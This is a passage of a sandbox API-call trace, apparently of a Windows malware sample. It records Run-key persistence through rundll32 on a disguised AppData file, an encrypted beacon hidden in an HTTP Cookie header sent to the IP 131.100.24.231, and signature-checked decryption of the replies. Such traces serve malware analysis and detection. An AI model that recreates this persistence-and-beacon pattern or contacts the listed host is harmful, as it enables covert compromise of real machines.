pbHashObject=0x2a7ac48) returned 0x0 [0476.811] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0476.811] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0476.811] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0476.811] GetProcessHeap () returned 0x530000 [0476.811] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0476.811] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0476.811] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0476.812] GetProcessHeap () returned 0x530000 [0476.812] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6a0 [0476.812] GetProcessHeap () returned 0x530000 [0476.813] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0476.813] GetProcessHeap () returned 0x530000 [0476.813] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0476.813] GetProcessHeap () returned 0x530000 [0476.813] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b5be28 | out: hHeap=0x530000) returned 1 [0476.813] GetProcessHeap () returned 0x530000 [0476.814] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0476.814] GetProcessHeap () returned 0x530000 [0476.814] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0476.814] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0476.814] GetProcessHeap () returned 0x530000 [0476.814] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a838e0 [0476.814] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DfksXWBtMcnnbpU") returned 105 [0476.815] GetProcessHeap () returned 0x530000 [0476.815] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a838e0 | out: hHeap=0x530000) returned 1 [0476.815] GetProcessHeap () returned 0x530000 [0476.815] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0476.815] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0476.816] GetProcessHeap () returned 0x530000 [0476.816] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0476.816] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DfksXWBtMcnnbpU") returned 105 [0476.816] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DfksXWBtMcnnbpU", cbData=0xd4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DfksXWBtMcnnbpU") returned 0x0 [0476.818] RegCloseKey (hKey=0x670) returned 0x0 [0476.818] GetProcessHeap () returned 0x530000 [0476.818] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6a0 | out: hHeap=0x530000) returned 1 [0476.818] GetProcessHeap () returned 0x530000 [0476.819] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0476.819] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe797a) returned 0x102 [0486.833] GetProcessHeap () returned 0x530000 [0486.833] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72c0 [0486.834] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0486.834] GetProcessHeap () returned 0x530000 [0486.834] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72c0 | out: hHeap=0x530000) returned 1 [0486.834] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0486.834] GetProcessHeap () returned 0x530000 [0486.834] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72c0 [0486.834] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0486.834] GetProcessHeap () returned 0x530000 [0486.834] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72c0 | out: hHeap=0x530000) returned 1 [0486.834] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0486.838] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0486.838] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0486.838] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0486.838] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0486.838] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0486.838] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0486.839] GetProcessHeap () returned 0x530000 [0486.839] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0486.839] GetProcessHeap () returned 0x530000 [0486.839] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72c0 [0486.839] GetProcessHeap () returned 0x530000 [0486.839] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0486.839] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0486.841] GetProcessHeap () returned 0x530000 [0486.841] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72c0 | out: hHeap=0x530000) returned 1 [0486.841] GetProcessHeap () returned 0x530000 [0486.841] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0486.842] GetProcessHeap () returned 0x530000 [0486.842] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0486.842] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0486.842] GetProcessHeap () returned 0x530000 [0486.842] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0486.842] GetProcessHeap () returned 0x530000 [0486.842] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0486.842] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0486.842] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0486.842] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0486.842] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0486.842] GetProcessHeap () returned 0x530000 [0486.843] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0486.843] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0486.843] GetProcessHeap () returned 0x530000 [0486.843] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bf98 [0486.843] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0486.843] GetProcessHeap () returned 0x530000 [0486.843] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0486.843] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf4b4) returned 0x0 [0486.843] GetProcessHeap () returned 0x530000 [0486.843] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd9) returned 0x2aa0b28 [0486.843] GetProcessHeap () returned 0x530000 [0486.844] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0486.844] GetProcessHeap () returned 0x530000 [0486.844] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0486.844] CryptBinaryToStringW (in: pbBinary=0x2aa0b28, cbBinary=0xd9, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0486.844] GetProcessHeap () returned 0x530000 [0486.844] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24a) returned 0x5edef0 [0486.844] CryptBinaryToStringW (in: pbBinary=0x2aa0b28, cbBinary=0xd9, dwFlags=0x40000001, pszString=0x5edef0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgDYiRjNI9TKlJgjoqdhQUMjVmQvmXBbUqm+xT21KRmu9B49JI3fQncbOiBb7X1I7ZoyXP91+yhppA==", pcchString=0x2cf504) returned 1 [0486.844] GetProcessHeap () returned 0x530000 [0486.844] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0486.844] GetProcessHeap () returned 0x530000 [0486.844] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630f8 [0486.844] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: BrtC=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgDYiRjNI9TKlJgjoqdhQUMjVmQvmXBbUqm+xT21KRmu9B49JI3fQncbOiBb7X1I7ZoyXP91+yhppA==\r\n") returned 307 [0486.844] GetProcessHeap () returned 0x530000 [0486.845] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630f8 | out: hHeap=0x530000) returned 1 [0486.845] GetProcessHeap () returned 0x530000 [0486.845] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5edef0 | out: hHeap=0x530000) returned 1 [0486.845] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0486.846] GetProcessHeap () returned 0x530000 [0486.846] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0486.846] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0486.849] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="IFfVBkyXLzLxTCxJwrPPZXuAVVBHDMJjLb", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0486.849] GetProcessHeap () returned 0x530000 [0486.849] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0486.849] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0486.849] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0486.850] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0486.850] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: BrtC=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgDYiRjNI9TKlJgjoqdhQUMjVmQvmXBbUqm+xT21KRmu9B49JI3fQncbOiBb7X1I7ZoyXP91+yhppA==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0488.267] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0488.267] GetProcessHeap () returned 0x530000 [0488.267] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0488.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x2df) returned 1 [0488.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b480df, dwNumberOfBytesToRead=0xfd21, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b480df*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0488.268] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0488.268] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0488.268] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0488.268] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0488.268] GetProcessHeap () returned 0x530000 [0488.268] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0488.268] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bf98, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bf98, pcbResult=0x2cf51c) returned 0x0 [0488.268] GetProcessHeap () returned 0x530000 [0488.268] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0488.269] GetProcessHeap () returned 0x530000 [0488.269] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ccb08 [0488.269] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0488.269] GetProcessHeap () returned 0x530000 [0488.269] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0488.270] GetProcessHeap () returned 0x530000 [0488.270] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ccb08 | out: hHeap=0x530000) returned 1 [0488.270] GetProcessHeap () returned 0x530000 [0488.270] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fe0 [0488.270] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0488.270] GetProcessHeap () returned 0x530000 [0488.270] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fe0 | out: hHeap=0x530000) returned 1 [0488.270] GetProcessHeap () returned 0x530000 [0488.270] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0488.270] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0488.270] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58bfe0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0488.271] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0488.271] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0488.271] GetProcessHeap () returned 0x530000 [0488.271] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0488.271] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0488.271] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bf9c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0488.273] GetProcessHeap () returned 0x530000 [0488.273] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c640 [0488.273] GetProcessHeap () returned 0x530000 [0488.274] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0488.274] GetProcessHeap () returned 0x530000 [0488.274] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0488.274] GetProcessHeap () returned 0x530000 [0488.275] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa0b28 | out: hHeap=0x530000) returned 1 [0488.275] GetProcessHeap () returned 0x530000 [0488.275] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0488.275] GetProcessHeap () returned 0x530000 [0488.275] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0488.275] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0488.276] GetProcessHeap () returned 0x530000 [0488.276] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83be0 [0488.276] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",vrWZhmXjgDni") returned 102 [0488.276] GetProcessHeap () returned 0x530000 [0488.276] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83be0 | out: hHeap=0x530000) returned 1 [0488.276] GetProcessHeap () returned 0x530000 [0488.276] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0488.276] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x660, lpdwDisposition=0x0) returned 0x0 [0488.277] GetProcessHeap () returned 0x530000 [0488.277] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0488.277] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",vrWZhmXjgDni") returned 102 [0488.277] RegSetValueExW (in: hKey=0x660, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",vrWZhmXjgDni", cbData=0xce | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",vrWZhmXjgDni") returned 0x0 [0488.278] RegCloseKey (hKey=0x660) returned 0x0 [0488.278] GetProcessHeap () returned 0x530000 [0488.278] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c640 | out: hHeap=0x530000) returned 1 [0488.279] GetProcessHeap () returned 0x530000 [0488.279] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0488.279] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe486e) returned 0x102 [0498.283] GetProcessHeap () returned 0x530000 [0498.284] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0498.284] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0498.284] GetProcessHeap () returned 0x530000 [0498.284] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0498.284] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0498.284] GetProcessHeap () returned 0x530000 [0498.284] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0498.284] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0498.284] GetProcessHeap () returned 0x530000 [0498.284] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0498.284] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0498.286] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0498.286] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: 